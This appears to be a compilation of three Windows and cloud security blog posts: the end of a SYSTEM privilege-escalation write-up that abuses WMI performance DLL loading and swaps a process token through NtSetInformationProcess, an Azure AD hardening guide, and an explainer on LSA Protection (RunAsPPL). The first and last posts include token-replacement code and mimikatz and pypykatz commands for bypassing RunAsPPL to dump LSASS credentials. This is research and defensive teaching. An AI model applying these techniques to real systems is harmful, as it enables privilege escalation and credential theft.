CoInitializeSecurity(NULL, -1, NULL, NULL, RPC_C_AUTHN_LEVEL_NONE, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE, 0);
CoCreateInstance(CLSID_WbemLocator, NULL, CLSCTX_INPROC_SERVER, IID_IWbemLocator, (void**)&pWbemLocator);
bstrNameSpace = SysAllocString(L"\\\\.\\root\\cimv2");
pWbemLocator->ConnectServer(bstrNameSpace, NULL, NULL, NULL, 0L, NULL, NULL, &pNameSpace);
CoCreateInstance(CLSID_WbemRefresher, NULL, CLSCTX_INPROC_SERVER, IID_IWbemRefresher, (void**)&pRefresher);
pRefresher->QueryInterface(IID_IWbemConfigureRefresher, (void**)&pConfig);
pConfig->AddEnum(pNameSpace, L"Win32_Perf", 0, NULL, &pEnum, &lID);
pRefresher->Refresh(0L);
pEnum->GetObjects(0L, dwNumObjects, apEnumAccess, &dwNumReturned);

The first function calls are pretty standard when working with DCOM. CoInitializeEx and CoInitializeSecurity are necessary to set up a basic communication channel between the client and the DCOM server. Then, the first CoCreateInstance gives you an initial pointer to the IWbemLocator interface for WMI. This allows you to connect to the root\cimv2 namespace by invoking ConnectServer, which in turn returns a pointer to the corresponding IWbemServices namespace object. If you have ever used WMI queries in PowerShell, this should sound familiar. After that, you can access the class you want. Here I picked Win32_Perf because I knew it already worked with Get-WmiObject Win32_Perf. Finally, a first call to GetObjects is required to get the number of objects that will be returned by the server. This way, the client can allocate enough memory and then call GetObjects a second time to get the actual data. Yeah, we are doing quite low-level stuff in comparison to PowerShell, so you have to do this kind of thing yourself… Anyway, in our case, this second call is not required as the first one is enough to trigger the collection of the Performance counters’ data.

Communicate with the WMI Service (or not?)

Here comes the interesting part. This part is the true reason why I wanted to write about this particular exploit in the first place. Indeed, I used quite an unconventional trick to have a SYSTEM shell spawn in the same console.

When dealing with a privilege escalation exploit that involves DLL loading (in a privileged service), a very common problem arises, especially when you want to develop a standalone tool. From your exploit tool, how do you interact with the code that is executed within your DLL? Let’s say you want to spawn a SYSTEM command prompt. You can invoke CreateProcess for example but then… what? Well, good job, the command prompt has just spawned on the service’s Desktop (in session 0) and you have no way to interact with it. To solve this problem, exploit writers usually use IPC mechanisms to create a communication channel so that the client (i.e. the exploit) can interact with the server (i.e. the exploited service). For example, you can set up some named pipes, a main one to accept client requests and then three other ones so that the client can access the stdin/stdout/stderr I/O of the created process. This is actually how PsExec works by the way. The same thing can also be achieved using a TCP socket. From the exploited service (i.e. within the code of the DLL), you could bind to a local TCP port, create a process and then redirect its input/output to the socket. This way, a client just needs to connect to the local TCP port to interact with the created process. This is how bind shells work.

These are well-known techniques that I also used in previous exploits. This time though, I wanted to opt for something a bit different. And by “a bit different”, I actually mean “completely different” because I did not use any IPC mechanism at all! Or at least, not a conventional one…

In our scenario, as opposed to a typical DLL hijacking for example, we start with a significant advantage that I intentionally omitted to mention: we control the full path, and most importantly the name of the DLL that will be loaded by the privileged service. I insist on this detail because the name of the DLL itself can convey all the information we need, without having to rely on a standard IPC mechanism.

Here is the plan in a few basic steps:

  1. Create a process in the background, in a suspended state.
  2. Write the embedded DLL payload to an arbitrary location, such as the user’s Temp folder.
  3. Create the Performance subkey and populate it with the appropriate values, especially the path of the DLL file that was previously created.
  4. Instantiate the WMI class Win32_Perf to trigger the DLL loading.

At step 1, the idea is to spawn a cmd.exe Process for example. As a result of the CreateProcess call, you will get the handles and IDs that are associated with the created Process and its main Thread. At step 2, when writing the payload DLL to the disk, we will include the ID of the Process that has just been created in the name of the file (e.g.: performance_1234.dll). You’ll see why in a moment. Steps 3 and 4 were already mentioned in the introduction and are rather self-explanatory.

From the service’s standpoint, the DLL will first be loaded and DllMain will be invoked. Then, it will call OpenPerfData, which is one of the three functions that are exported by our library. As a side note, this is particularly convenient because we can write our code outside of the loader lock. The OpenPerfData function is where our payload will be executed. From there, we can first retrieve the name of the module (i.e. the name of the DLL file). Since the filename contains the PID of the Process we initially created as a regular user, we will be able to perform some “adjustments” on it, in the context of NT AUTHORITY\SYSTEM.

What I mean by “adjustments” is that we will actually replace its primary Token.

Replace a Process Level Token

As a reminder, on Windows, a Token represents the security context of a user in a Process or Thread. It holds some information such as the groups a user belongs to or the privileges it has. They can be of two types: Primary or Impersonation. A Primary Token is associated to a Process whereas an Impersonation Token is associated to a Thread. Thread level (i.e. Impersonation) Tokens are relevant when a service wants to impersonate a client for example. Process level Tokens, on the other hand, are not really meant to be replaced at runtime.

Before working on this exploit, my assumption was that, unlike Thread level Tokens, Process level Tokens were immutable. As soon as a Process is created, I thought that you could not change its Primary Token, unless you were able to execute some arbitrary code in the Kernel. But I was wrong! Though, in my defense, I have to say that this involves some undocumented stuff.

The exploit steps I mentioned previously should make a little more sense now. From within the DLL (i.e. in the context of the privileged service), here are the steps we need to follow:

  1. Create a copy of the current Process’ Token (by calling DuplicateTokenEx).
  2. Open the client’s Process. We can do that because we know its PID.
  3. Replace the client’s Process Token with the one we created at step 1.

The first step is very simple and self-explanatory. Steps 2 and 3 are self-explanatory as well but they actually require very specific privileges. Fortunately for us, it seems that the Token of the WMI service’s Process has all the privileges that exist on Windows, as illustrated on the screenshot below. Anyway, as long as we execute arbitrary code in the context of NT AUTHORITY\SYSTEM we can recover any privilege we want.

Below is a stripped-down version of the code that allows us to replace the Token of the Process that was created by the client with the copy of the current SYSTEM Token. It should be noted that, for this operation to succeed, the target Process must be in a SUSPENDED state.

PROCESS_ACCESS_TOKEN tokenInfo = { 0 };
tokenInfo.Token = hSystemTokenDup;
tokenInfo.Thread = NULL;

NtSetInformationProcess(
    hClientProcess,                 // Client's Process handle (PROCESS_ALL_ACCESS)
    ProcessAccessToken,             // Undocumented information class for setting the Token
    &tokenInfo,                     // A reference to a structure containing the SYSTEM Token handle
    sizeof(tokenInfo)               // Size of the structure
);

As briefly mentioned previously, the NtSetInformationProcess function is not documented. It is part of the Native API so it is not directly accessible within the Windows SDK. You have to define its prototype in your own header file and then import it manually from the NTDLL at runtime. Anyway, this function is very powerful as it allows you to change the Token of a Process, even after it has been created. Pretty cool, isn’t it?
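For completeness, here is roughly what the manual definition and import look like. The structure layout and the information class value (9) come from publicly available reverse engineering of ntdll (e.g. the ReactOS and Process Hacker headers), not from the Windows SDK, so treat this as a sketch:

```c
#include <windows.h>
#include <winternl.h> // PROCESSINFOCLASS, NTSTATUS

// Undocumented: the structure expected by NtSetInformationProcess
// when replacing a Process' primary Token.
typedef struct _PROCESS_ACCESS_TOKEN {
    HANDLE Token;   // Primary Token to assign
    HANDLE Thread;  // Unused here, set to NULL
} PROCESS_ACCESS_TOKEN, *PPROCESS_ACCESS_TOKEN;

// Undocumented information class (value from public sources).
#define ProcessAccessToken ((PROCESSINFOCLASS)9)

// Prototype of the native function, defined by hand...
typedef NTSTATUS (NTAPI *PNT_SET_INFORMATION_PROCESS)(
    HANDLE ProcessHandle,
    PROCESSINFOCLASS ProcessInformationClass,
    PVOID ProcessInformation,
    ULONG ProcessInformationLength
);

// ... and resolved from the NTDLL at runtime.
static PNT_SET_INFORMATION_PROCESS ResolveNtSetInformationProcess(void) {
    return (PNT_SET_INFORMATION_PROCESS)GetProcAddress(
        GetModuleHandleW(L"ntdll.dll"), "NtSetInformationProcess");
}
```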

Once this is done, the client can simply resume the main Thread and that’s it! You get a nice SYSTEM shell in your console.

Conclusion

There are some implementation steps I did not mention in this post because the main point was to discuss how we could develop an exploit that does not require IPC communications. For example, I used a Global Event in order to synchronize the main exploit with the payload that is executed within the DLL. But, the exploit would have worked without it as well.

Then, when I say that I did not use Inter-Process Communications, one could argue that it is not completely true because I did use the name of the DLL to convey some information in the end. But, it turns out that it is not strictly required either. You could still do the exact same thing without using this trick. For example, you could implement something very similar to an “egg hunter”. You could create an egg (e.g.: a predefined string) in the memory of your process and then, from within the DLL, you could open every single Process and search its memory to find this egg. From there, you can get the ID of the main Process and thus determine the ID of its child Process as well. It was just way more convenient to communicate the PID directly through the filename here.

With this little exploit development process, I learned a few things that I wanted to share. So, as always, I hope you have learned something too by reading this. That’s it for today!


Hands off my (MS) cloud services!

Ok, this title is deliberately provocative, but the goal of this post is just to share some (as usual) “quick & dirty” tricks with all of you who are concerned about securing your Microsoft O365/Exchange/AzureAD online instances.

If you are facing the problem of having one or more services exposed on the Microsoft cloud and want to have a clearer view of the security configurations, it’s not easy to find the right path, even though there are a ton of online resources about this subject.

Since I’m definitely not an expert, I often asked my friend @anformato for help and he always gave me useful tips. So when I later proposed that we write a post together on this topic in order to share “real life” experiences, he enthusiastically accepted.

In this first part we will talk about the Azure Active Directory “ecosystem”.

So let’s start from the beginning!

Azure Active Directory

You probably have your on-premises Active Directory Domain/Forest replicated to your online Azure AD instance, right?

Don’t replicate everything

You should carefully evaluate which objects you really need to synchronize and avoid replicating everything. Remember “less is more”: the more you replicate, the more you enlarge the possible attack surface.

Synchronize only the necessary objects (like users) that really need to access online services. It’s also good practice not to replicate administrators and other highly privileged users. Azure AD admins should not be shared with on-premises admins and vice versa (more on this in the dedicated chapter).

Replication can be easily configured with the “Azure AD Connect” tool:

Remember to perform this task before the first synchronization, otherwise it will be painful to remove the unnecessary objects replicated to Azure AD (I had to open a case with MS support…).

Limit Administrative Access

Reducing the number of persistent Global Administrators is really a good practice.
Since only another GA can reset a Global Admin’s password, you should have at least 2 Global Admin users. (Microsoft recommends having no more than 4 or 5 GAs; do you really need more than 5?)

Azure AD roles allow you to grant granular permissions to your admins, providing you with a way to implement the principle of least privilege. There are a bunch of predefined roles which you should definitely take into consideration for delegating administrative tasks.

A good starting point to understand Role Based Access control is here.

 
You should not use your everyday accounts to manage administrative tasks; instead, create dedicated accounts for each user with administrative privileges. Those accounts should be cloud-only accounts with no ties to on-premises Active Directory.
 
If your tenant has Azure Active Directory P2 licenses, a good practice is to use Privileged Identity Management. It allows you to implement just-in-time privileged access to Azure resources and Azure AD with approval flows.
 
All admin users must obviously use MFA, preferably with the MS Authenticator App instead of SMS or a phone call as the second authentication factor. You should definitely avoid using personal accounts to manage M365 or Azure resources.
 
Last but not least: in order to prevent being accidentally locked out of your Azure Active Directory, have in place a procedure to manage emergency access. Ask yourself what will happen if the service is unavailable because of a network issue or IdP outage, or a natural disaster, or if the other GA users are not available.
Some procedures to manage emergencies can be found here.

Restrict access to Azure Portal

By default, every Azure AD user can access the portal even without specific roles. This means they can access the entire directory and get information about AD settings, including users, groups, and so on. You might argue: ok, a standard Active Directory user can also access all this information on the on-premises side, why should I care? Remember, your Azure AD is normally exposed to the whole internet, so if a user is compromised it would be a juicy option for an attacker, do you agree? We will talk about it later…

Keep in mind that restricting access to the portal does not block access to the various Azure APIs.

Third-party tools such as @_dirkjan’s fantastic “roadrecon”, which interacts with some “undocumented” MS Graph APIs, allow you to dump the whole directory for later investigation and analysis.

Restrict access to the MSOnline PowerShell module

This module provides a lot of PowerShell cmdlets for administering Azure AD. Even if it’s now deprecated, it’s still available, and by default a standard user can access the MSOL service and run lots of “Get-Msol*” commands.

So the question is: how can we stop this? Well, the answer is very simple: as an admin, launch this command in an MSOL session:
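The flag in question is the company-wide UsersPermissionToReadOtherUsersEnabled setting mentioned later in this section; assuming the MSOnline module and an authenticated admin session (Connect-MsolService), the command would look like this:

```powershell
# Assumes the MSOnline module and an existing admin session (Connect-MsolService).
Set-MsolCompanySettings -UsersPermissionToReadOtherUsersEnabled $false
```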

This will prevent standard (non-admin) users from reading other users’ information and in fact inhibits most of the cmdlets:

It also blocks the “roadrecon” tool:

…and the AADInternals tools too:

This will also somehow “stop” the dangerous phishing technique via “device code authentication” as described here.

But keep in mind that it will not inhibit other operations, such as sending an email on behalf of the victim once an access token has been obtained. To prevent these types of attacks you should implement dedicated “Conditional Access policies”, available with Premium subscriptions.

Back to us: what could be the side effects of setting this flag? To be honest, it’s not so clear. Googling around, you can find some old posts stating that if “UsersPermissionToReadOtherUsersEnabled is set to false in Azure Active Directory (AAD), users are unable to add external/internal members in Microsoft Teams”.

We were unable to reproduce this misbehavior with Teams, and there is no official note from MS about it. It seems that this problem has been resolved.

You can also completely block access to all MSOL cmdlets, including admins, with the AzureADPreview module:

Know what you are doing, because it seems there is no possibility to add exceptions (for example, for admin users).

Restrict access to the AzureAD PowerShell module

Given that this module is the replacement for the MSOL module, if you have already disabled the permissions via the MSOL cmdlet, the API won’t be available in AzureAD either:

You can even restrict access to the Azure AD powershell by assigning roles, as described here

$appId = "1b730954-1685-4b74-9bfd-dac224a7b894" # AppId of the Azure AD PowerShell application
$sp = Get-AzureADServicePrincipal -Filter "appId eq '$appId'"
if (-not $sp) { $sp = New-AzureADServicePrincipal -AppId $appId }
$user = Get-AzureADUser -ObjectId <upn> # permit only this user to access Azure AD PS
New-AzureADServiceAppRoleAssignment -ObjectId $sp.ObjectId -ResourceId $sp.ObjectId -Id ([Guid]::Empty.ToString()) -PrincipalId $user.ObjectId

If a user is not explicitly permitted, he cannot access it:

Following the same procedure, you can also restrict access to the MS Graph module (AppId: 14d82eec-204b-4c2f-b7e8-296a70dab67e).

Disable Legacy Authentication

Disabling Legacy Authentication is a must-do if you are thinking about how to reduce your attack surface.

Legacy Authentication refers to all protocols that use the insecure Basic Authentication mechanism, and if you don’t block legacy authentication, your MFA strategy won’t be as effective as expected.

Among legacy authentication protocols are:

  • Exchange ActiveSync (EAS)
  • Exchange Web Services (EWS)
  • IMAP4
  • MAPI over HTTP (MAPI/HTTP)
  • RPC over HTTP
  • POP3
  • Authenticated SMTP
  • ….

Modern authentication is based on the Active Directory Authentication Library (ADAL) and OAuth 2.0 which support multi-factor authentication and interactive sign-in.

But blocking legacy authentication in your directory is easier said than done.. you need to evaluate and understand the potential impacts first!

Analyzing the Azure AD sign-in logs is a good starting point.

  • Navigate to the Azure portal > Azure Active Directory > Sign-ins.
  • Add the Client App column if it is not shown by clicking on Columns > Client App.
  • Add filters > Client App > select all of the legacy authentication protocols. Select outside the filtering dialog box to apply your selections and close the dialog box

Unfortunately there is no magic “recipe”, you should avoid using applications which don’t support modern authentication 😦

For example, if you are still using the unsupported Outlook/Office 2010, it’s really time to upgrade to a newer version.

Blocking legacy authentication using Azure AD Conditional Access

The best way to block legacy authentication to Azure AD is through Conditional Access. Keep in mind it requires at least Azure Active Directory P1 licenses.

You can directly and indirectly block legacy authentication with CA policies and include/exclude specific users and groups as shown here

Consider enabling your blocking policy in Report-only mode to monitor the impacts before changing the state of the policy from “Report-only” to “On”.

Blocking legacy authentication service-side

If you don’t have Azure AD P1 or P2 licenses, the good news is that nothing is lost! Legacy authentication can be blocked service-side or resource-side.

Exchange Online

The easiest way is simply to disable the protocols which use legacy authentication by default, like POP3, IMAP, …

This can be done via the Exchange management PowerShell:

Get-CASMailbox -Filter {ImapEnabled -eq "true" -or PopEnabled -eq "true" } | Set-CASMailbox -ImapEnabled $false -PopEnabled $false

With this command you will disable IMAP and POP3 for all existing mailbox users. Once done, you can re-enable the protocols only for the specific subset of users who really need them.

You can also set a global policy which will disable these protocols for all new mailboxes:

Get-CASMailboxPlan -Filter {ImapEnabled -eq "true" -or PopEnabled -eq "true" } | set-CASMailboxPlan -ImapEnabled $false -PopEnabled $false

The problem with this setting arises if you don’t want to block protocols that can do both legacy and modern authentication. Exchange Online has a feature named authentication policies that you can use to block legacy authentication per protocol.

To manage authentication policy in Microsoft 365 Admin Center:

  • Navigate to the Microsoft 365 admin center
  • Settings > Org Settings
  • Navigate to Modern Authentication

You can fine-tune these settings even further by allowing/disallowing basic authentication protocols for specific users with the authentication policy cmdlets:

New-AuthenticationPolicy -Name "Allow Basic Authentication for POP3"
Set-AuthenticationPolicy -Identity "Allow Basic Authentication for POP3" -AllowBasicAuthPop
Set-User -Identity [email protected] -AuthenticationPolicy "Allow Basic Authentication for POP3"

SharePoint Online

In order to disable legacy authentication on your SharePoint Online tenant, you can use the following cmdlets:

Connect-SPOService -Url https://<tenant>-admin.sharepoint.com
Get-SPOTenant
Set-SPOTenant -LegacyAuthProtocolsEnabled $false

Applications, Consent and Permissions.. oh my..

The variegated world of the so-called “Applications” essentially has to interact with the ecosystem of O365 services exposed through public APIs, and it’s up to you to manage and grant the appropriate permissions requested by the apps. It’s a complex topic, and in this chapter we will give you some simple advice. If security is your concern (I bet it is), the first thing to do is to prohibit user consent for “unknown” apps, given that it’s allowed by default (??).

Why should you do it? Because setting a more restrictive consent (as highlighted in the screenshot) will prevent most of the well-known phishing techniques that abuse “malicious apps” and OAuth2. You can find an excellent example by @merlos here.

If the user clicks on the malicious link in the phishing email, he will no longer have the possibility to accept the requested permissions:

Instead, he will be presented with this screen, where the Organization’s Admin approval is required:

You should also disable the “Users can register applications” feature.

Only users with administrative roles, or a limited subset of users with the “Application developer” role, should be allowed to register custom-developed applications, and only after these have been reviewed and evaluated from a security perspective as well.

Conclusion

In this short post we hope to have given you some useful tips on how to secure your tenants. The topic is clearly much more complex and requires dedicated skills, but as usual you have to start from the basics 😉

In the next post we will (hopefully) write about logging, auditing and detection.. stay tuned!

.. and adopt Two Factor Authentication (2FA) for all your users!!

Do You Really Know About LSA Protection (RunAsPPL)?

When it comes to protecting against credentials theft on Windows, enabling LSA Protection (a.k.a. RunAsPPL) on LSASS may be considered as the very first recommendation to implement. But do you really know what a PPL is? In this post, I want to cover some core concepts about Protected Processes and also prepare the ground for a follow-up article that will be released in the coming days.

Introduction

When you think about it, RunAsPPL for LSASS is a true quick win. It is very easy to configure as the only thing you have to do is add a simple value in the registry and reboot. Like any other protection though, it is not bulletproof and it is not sufficient on its own, but it is still particularly efficient. Attackers will have to use some relatively advanced tricks if they want to work around it, which ultimately increases their chance of being detected.

Therefore, as a security consultant, this is one of the top recommendations I usually give to a client. However, from a client’s perspective, I noticed that this protection tends to be confused with Credential Guard, which is completely different. I think that this confusion comes from the fact that the latter seems to provide a more robust mechanism although Credential Guard and LSA Protection are actually complementary.

But of course, as a consultant, you have to explain these concepts if you want to convince a client that they should implement both recommendations. Some time ago, I had to give such explanation so, without going into too much detail, I think I said something like this about LSA Protection: “only a digitally signed binary can access a protected process”. You probably noticed that this sentence does not make much sense. This is how I realized that I didn’t really know how Protected Processes worked. So, I did some research and I found some really interesting things along the way, hence why I wanted to write about it.

Disclaimer – Most of the concepts I discuss in this post are already covered by the official documentation and the book Windows Internals 7th edition (Part 1), which were my two main sources of information. The objective of this blog post is not to paraphrase them but rather gather the information which I think is the most valuable from a security consultant’s perspective.

How to Enable LSA Protection (RunAsPPL)

As mentioned previously, RunAsPPL is very easy to enable. The procedure is detailed in the official documentation and has also been covered in many blog posts before.

If you want to enable it within a corporate environment, you should follow the procedure provided by Microsoft and create a Group Policy: Configuring Additional LSA Protection. But if you just want to enable it manually on a single machine, you just have to:

  1. open the Registry Editor (regedit.exe) as an Administrator;
  2. open the key HKLM\SYSTEM\CurrentControlSet\Control\Lsa;
  3. add the DWORD value RunAsPPL and set it to 1;
  4. reboot.
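The same registry change can be made with a one-liner from an elevated command prompt (equivalent sketch; a reboot is still required):

```shell
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /t REG_DWORD /d 1 /f
```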

That’s it! You are done!

Before applying this setting throughout an entire corporate environment, there are two particular cases to consider though. They are both described in the official documentation. If the answer to at least one of the two following questions is “yes” then you need to take some precautions.

  • Do you use any third-party authentication module?
  • Do you use UEFI and/or Secure Boot?

Third-party authentication module – If a third-party authentication module is required, such as in the case of a Smart Card Reader for example, you should make sure that they meet the requirements that are listed here: Protected process requirements for plug-ins or drivers. Basically, the module must be digitally signed with a Microsoft signature and it must comply with the Microsoft Security Development Lifecycle (SDL). The documentation also contains some instructions on how to set up an Audit Policy prior to the rollout phase to determine whether such module would be blocked if RunAsPPL were enabled.

Secure Boot – If Secure Boot is enabled, which is usually the case with modern laptops for example, there is one important thing to be aware of. When RunAsPPL is enabled, the setting is stored in the firmware, in a UEFI variable. This means that, once the registry key is set and the machine has rebooted, deleting the newly added registry value will have no effect and RunAsPPL will remain enabled. If you want to disable the protection, you have to follow the procedure provided by Microsoft here: To disable LSA protection.

You Shall Not Pass!

By now, I assume you all know that RunAsPPL is an effective protection against tools such as Mimikatz (more about that in the next parts) or ProcDump from the Windows Sysinternals tools suite for example. An output such as the one below should therefore look familiar.

This screenshot shows several important things:

  • the current user is a member of the default Administrators group;
  • the current user has SeDebugPrivilege (although it is currently disabled);
  • the command privilege::debug in Mimikatz successfully enabled SeDebugPrivilege;
  • the command sekurlsa::logonpasswords failed with the error code 0x00000005.

So, despite all the privileges the current user has, the command failed. To understand why, we should take a look at the kuhl_m_sekurlsa_acquireLSA() function in mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c. Here is a simplified version of the code that shows only the part we are interested in.

HANDLE hData = NULL;
DWORD pid;
DWORD processRights = PROCESS_VM_READ | PROCESS_QUERY_INFORMATION;

kull_m_process_getProcessIdForName(L"lsass.exe", &pid);
hData = OpenProcess(processRights, FALSE, pid);

if (hData && hData != INVALID_HANDLE_VALUE) {
    // if OpenProcess OK
} else {
    PRINT_ERROR_AUTO(L"Handle on memory");
}

In this code snippet, PRINT_ERROR_AUTO is a macro that basically prints the name of the function which failed along with the error code. The error code itself is retrieved by invoking GetLastError(). For those of you who are not familiar with the way the Windows API works, you just have to know that SetLastError() and GetLastError() are two Win32 functions that allow you to set and get the last standard error code. The first 500 codes are listed here: System Error Codes (0-499).

Apart from that, the rest of the code is pretty straightforward. It first gets the PID of the process called lsass.exe and then, it tries to open it (i.e. get a process handle) with the flags PROCESS_VM_READ and PROCESS_QUERY_INFORMATION by invoking the Win32 function OpenProcess. What we can see on the previous screenshot is that this function failed with the error code 0x00000005, which simply means “Access is denied”. This confirms that, once RunAsPPL is enabled, even an administrator with SeDebugPrivilege cannot open LSASS with the required access flags.

All the things I have explained so far can be considered common knowledge as they have been discussed in many other blog posts or pentest cheat sheets before. But I had to do this recap to make sure we are all on the same page and also to introduce the following parts.

Bypassing RunAsPPL with Currently Known Techniques

At the time of writing this blog post, there are three main known techniques for bypassing RunAsPPL and accessing the memory of lsass.exe (or any other PPL in general). Once again, this has already been discussed in other blog posts, so I will try to keep this short.

Technique 1 – The Revenge of the Kiwi

In the previous part, I stated that RunAsPPL effectively prevented Mimikatz from accessing the memory of lsass.exe, but this tool is actually also the most commonly known technique for bypassing it.

To do so, Mimikatz uses a digitally signed driver to remove the protection flag of the Process object in the Kernel. The file mimidrv.sys must be located in the current folder in order to be loaded as a Kernel driver service using the command !+. Then, you can use the command !processprotect to remove the protection and finally access lsass.exe.

mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

Once you are done, you can even “restore” the protection using the same command, but without the /remove argument and finally unload the driver with !-.

mimikatz # !processprotect /process:lsass.exe
mimikatz # !-

There is one thing to be aware of if you do that though! You have to know that Mimikatz does not restore the protection level to its original level. The two screenshots below show the protection level of the lsass.exe process before and after issuing the command !processprotect /process:lsass.exe. As you can see, when RunAsPPL is enabled, the protection level is PsProtectedSignerLsa-Light whereas it is PsProtectedSignerWinTcb after the protection was restored by Mimikatz. In a way, this renders the system even more secure than it was as you will see in the next part but it could also have some undesired side effects.

Technique 2 – Bring Your Own Driver

The major drawback of the previous method is that it can be easily detected by an antivirus. Even if you are able to execute Mimikatz in-memory for example, you still have to copy mimidrv.sys onto the target. At this point, you could consider compiling a custom version of the driver to evade signature-based detection, but this will also break the digital signature of the file. So, unless you are willing to pay a few hundred dollars to get your new driver signed, this will not do.

If you don’t want to go through the official signing process, there is a clever trick you can use. This trick consists in loading an official but vulnerable driver that can be exploited to run arbitrary code in the Kernel. Once the driver is loaded, it can be exploited from User-land to load an unsigned driver, for example. This technique is implemented in gdrv-loader and PPLKiller for instance.

Technique 3 – Python & Katz

The last two techniques both rely on the use of a driver to execute arbitrary code in the Kernel and disable the process protection. Such a technique is still very dangerous: make one mistake and you trigger a BSOD.

More recently though, SkelSec presented an alternative method for accessing lsass.exe. In an article entitled Duping AV with handles, he presented a way to bypass AV detection/blocking access to LSASS process.

If you want to access LSASS’ memory, the first thing you have to do is invoke OpenProcess to get a handle with the appropriate rights on the Process object. Therefore, some AV software may block such an attempt, thus effectively killing the attack in its early stage. The idea behind the technique described by SkelSec is simple: do not invoke OpenProcess at all. But how do you get the initial handle then? The answer came from the following observation: sometimes, other processes, such as AV software, already have an open handle on the LSASS process in their memory space. So, as an administrator with debug privileges, you can copy this handle into your own process and then use it to access LSASS.

It turns out this technique serves another purpose. It can also be used to bypass RunAsPPL, because some unprotected processes may have obtained a handle on the LSASS process by other means, using a driver for instance. In that case, you can use pypykatz with the following command.

pypykatz live lsa --method handledup

On some occasions, this method worked perfectly fine for me but it is still a bit random. The chance of success highly depends on the target environment, which explains why I was not able to reproduce it on my lab machine.

What are PPL Processes?

Here comes the interesting part. In the previous paragraphs, I intentionally glossed over some key concepts. I chose to present all the things that are commonly known first so that I can explain them in more detail here.

A Long Time Ago in a Galaxy Far, Far Away…

OK, it was not that long ago and it was not that far away either. But still, the history behind PPLs is quite interesting and definitely worth mentioning.

First things first, PPL means Protected Process Light but, before that, there were just Protected Processes. The concept of Protected Process was introduced with Windows Vista / Server 2008 and its objective was not to protect your data or your credentials. Its initial objective was to protect media content and comply with DRM (Digital Rights Management) requirements. Microsoft developed this mechanism so that your media player could read a Blu-ray for instance, while preventing you from copying its content. At the time, the requirement was that the image file (i.e. the executable file) had to be digitally signed with a special Windows Media Certificate (as explained in the “Protected Processes” part of Windows Internals).

In practice, a Protected Process can be accessed by an unprotected process only with very limited privileges: PROCESS_QUERY_LIMITED_INFORMATION, PROCESS_SET_LIMITED_INFORMATION, PROCESS_TERMINATE and PROCESS_SUSPEND_RESUME. This set can even be reduced for some highly-sensitive processes.

A few years later, starting with Windows 8.1 / Server 2012 R2, Microsoft introduced the concept of Protected Process Light. PPL is actually an extension of the previous Protected Process model and adds the concept of “Protection level”, which basically means that some PP(L) processes can be more protected than others.

Protection Levels

The protection level of a process was added to the EPROCESS kernel structure and is more specifically stored in its Protection member. This Protection member is a PS_PROTECTION structure and is documented here.

typedef struct _PS_PROTECTION {
    union {
        UCHAR Level;
        struct {
            UCHAR Type   : 3;
            UCHAR Audit  : 1;                  // Reserved
            UCHAR Signer : 4;
        };
    };
} PS_PROTECTION, *PPS_PROTECTION;

Although it is represented as a structure, all the information is stored in the two nibbles of a single byte (Level is a UCHAR, i.e. an unsigned char). The first 3 bits represent the protection Type (see PS_PROTECTED_TYPE below). It defines whether the process is a PP or a PPL. The last 4 bits represent the Signer type (see PS_PROTECTED_SIGNER below), i.e. the actual level of protection.

typedef enum _PS_PROTECTED_TYPE {
    PsProtectedTypeNone = 0,
    PsProtectedTypeProtectedLight = 1,
    PsProtectedTypeProtected = 2
} PS_PROTECTED_TYPE, *PPS_PROTECTED_TYPE;

typedef enum _PS_PROTECTED_SIGNER {
    PsProtectedSignerNone = 0,      // 0
    PsProtectedSignerAuthenticode,  // 1
    PsProtectedSignerCodeGen,       // 2
    PsProtectedSignerAntimalware,   // 3
    PsProtectedSignerLsa,           // 4
    PsProtectedSignerWindows,       // 5
    PsProtectedSignerWinTcb,        // 6
    PsProtectedSignerWinSystem,     // 7
    PsProtectedSignerApp,           // 8
    PsProtectedSignerMax            // 9
} PS_PROTECTED_SIGNER, *PPS_PROTECTED_SIGNER;

As you probably guessed, a process’ protection level is defined by a combination of these two values. The below table lists the most common combinations.

Protection level                 Value  Signer            Type
PS_PROTECTED_SYSTEM              0x72   WinSystem (7)     Protected (2)
PS_PROTECTED_WINTCB              0x62   WinTcb (6)        Protected (2)
PS_PROTECTED_WINDOWS             0x52   Windows (5)       Protected (2)
PS_PROTECTED_AUTHENTICODE        0x12   Authenticode (1)  Protected (2)
PS_PROTECTED_WINTCB_LIGHT        0x61   WinTcb (6)        Protected Light (1)
PS_PROTECTED_WINDOWS_LIGHT       0x51   Windows (5)       Protected Light (1)
PS_PROTECTED_LSA_LIGHT           0x41   Lsa (4)           Protected Light (1)
PS_PROTECTED_ANTIMALWARE_LIGHT   0x31   Antimalware (3)   Protected Light (1)
PS_PROTECTED_AUTHENTICODE_LIGHT  0x11   Authenticode (1)  Protected Light (1)

Signer Types

In the early days of Protected Processes, the protection level was binary: either a process was protected or it was not. We saw that this changed when PPLs were introduced with Windows NT 6.3. Both PP and PPL processes now have a protection level which is determined by a signer level, as described previously. Therefore, another interesting thing to know is how the signer type and the protection level are determined.

The answer to this question is quite simple. Although there are some exceptions, the signer level is most commonly determined by a special field in the file’s digital certificate: Enhanced Key Usage (EKU).

On this screenshot, you can see two examples, wininit.exe on the left and SgrmBroker.exe on the right. In both cases, we can see that the EKU field contains the OID that represents the Windows TCB Component signer type. The second highlighted OID represents the protection level, which is Protected Process Light in the case of wininit.exe and Protected Process in the case of SgrmBroker.exe. As a result, we know that the latter can be executed as a PP whereas the former can only be executed as a PPL. However, they will both have the WinTcb level.

Protection Precedence

The last key aspect that needs to be discussed is the Protection Precedence. In the “Protected Process Light (PPL)” part of Windows Internals 7th Edition Part 1, you can read the following:

When interpreting the power of a process, keep in mind that first, protected processes always trump PPLs, and that next, higher-value signer processes have access to lower ones, but not vice versa.

In other words:

  • a PP can open a PP or a PPL with full access, as long as its signer level is greater or equal;
  • a PPL can open another PPL with full access, as long as its signer level is greater or equal;
  • a PPL cannot open a PP with full access, regardless of its signer level.

Note: it goes without saying that the ACL checks still apply. Being a Protected Process does not grant you super powers. If you are running a protected process as a low privileged user, you will not be able to magically access other users’ processes. It’s an additional protection.

To illustrate this, I picked 3 easily identifiable processes / image files:

  • wininit.exe – Session 0 initialization
  • lsass.exe – LSASS process
  • MsMpEng.exe – Windows Defender service

Pr.  Process      Type             Signer       Level
1    wininit.exe  Protected Light  WinTcb       PsProtectedSignerWinTcb-Light
